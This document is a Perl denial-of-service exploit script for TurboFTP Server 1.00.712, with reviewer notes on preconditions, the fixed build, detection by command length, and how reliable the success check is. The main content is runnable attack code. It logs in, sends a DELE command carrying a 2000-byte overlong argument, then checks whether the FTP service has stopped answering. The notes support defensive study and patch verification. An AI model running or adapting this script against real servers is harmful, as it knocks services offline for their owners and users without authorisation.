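# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date: 30 december 2009
# Author: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by: corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version : 1.00.712
# Issue fixed in: 1.00.720
# OS: Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln: DoS
# Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
# Reviewer notes:
#   * What is exercised: after an ordinary USER/PASS login the script sends a
#     single DELE command whose argument is 2000 bytes long, then opens a
#     second connection to see whether the service still answers. The page
#     does not say which part of the server fails on that input.
#   * Precondition: the command is only sent after authentication, so the
#     accounts that can log in define who can reach this code path.
#   * Remediation: the header lists 1.00.720 as the build with the fix.
#   * Detection: the request is a control-channel line roughly 2 KB long.
#     A length threshold on FTP command lines, in the server configuration
#     or on a network sensor, flags it regardless of the filler byte used.
#   * Result check: "DoS successful" means only that no greeting was read on
#     a fresh connection. An unreachable host or a filtered port produces
#     the same message, so confirm against the service state on the host.
#
# Code :
use strict;
use warnings;
use IO::Socket;

# Banner. The two backticks in the third art line appeared as <code>...</code>
# tags in the page this listing was taken from and are restored here. The
# spacing inside the art was collapsed by the same extraction and is left as
# found.
print
    "|------------------------------------------------------------------|\n",
    "| __ __ |\n",
    "| _________________/ /___ _____ / /________ _____ ___|\n",
    "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n",
    "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n",
    "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n",
    "||\n",
    "| http://www.corelan.be:8800 |\n",
    "||\n",
    "|-------------------------------------------------[ EIP Hunters ]--|\n\n",
    "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

# Exactly four arguments are required; the count is compared numerically.
if (@ARGV != 4) {
    print "\nusage: $0 <targetip> <targetport> <user> <password>\n";
    exit(0);
}

my ($host, $port, $user, $pass) = @ARGV;

# Opens a TCP connection to the FTP control port named on the command line.
# Returns the socket object, or undef when the connection cannot be made.
sub open_control {
    return IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => 'tcp',
    );
}

# Reads one reply line from the server and echoes it with the " ** " prefix.
# Returns the line, or undef when nothing could be read (peer closed).
sub show_reply {
    my ($conn) = @_;
    my $line = <$conn>;
    print " ** $line" if defined $line;
    return $line;
}

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;

print " [+] Connecting to server $host on port $port\n";
my $sock = open_control();
# The socket is tested before it is read, so a refused connection reaches the
# "Unable to connect" message instead of a read on an undefined handle.
my $greeting = $sock ? <$sock> : undef;
die " [!] \n*** Unable to connect ***\n" unless $greeting;
print " ** $greeting";
# A second line is consumed before login; presumably the tested build sends a
# two-line greeting. NOTE(review): confirm, a one-line banner would block here.
show_reply($sock);

print " [+] Logging in (user $user)\n";
print {$sock} "USER $user\r\n";
show_reply($sock);
print {$sock} "PASS $pass\r\n";
show_reply($sock);

print " [+] Sending payload\n";
print {$sock} "DELE " . $payload . "\r\n";
show_reply($sock);

# Liveness probe: a fresh connection that yields no greeting is reported as a
# successful DoS. See the result-check note in the header for its limits.
print " [+] Payload sent, now checking FTP server state\n";
my $probe  = open_control();
my $banner = $probe ? <$probe> : undef;
die " [+] DoS successful\n" unless $banner;
print " [!] DoS did not seem to work\n";
print " ** $banner\n";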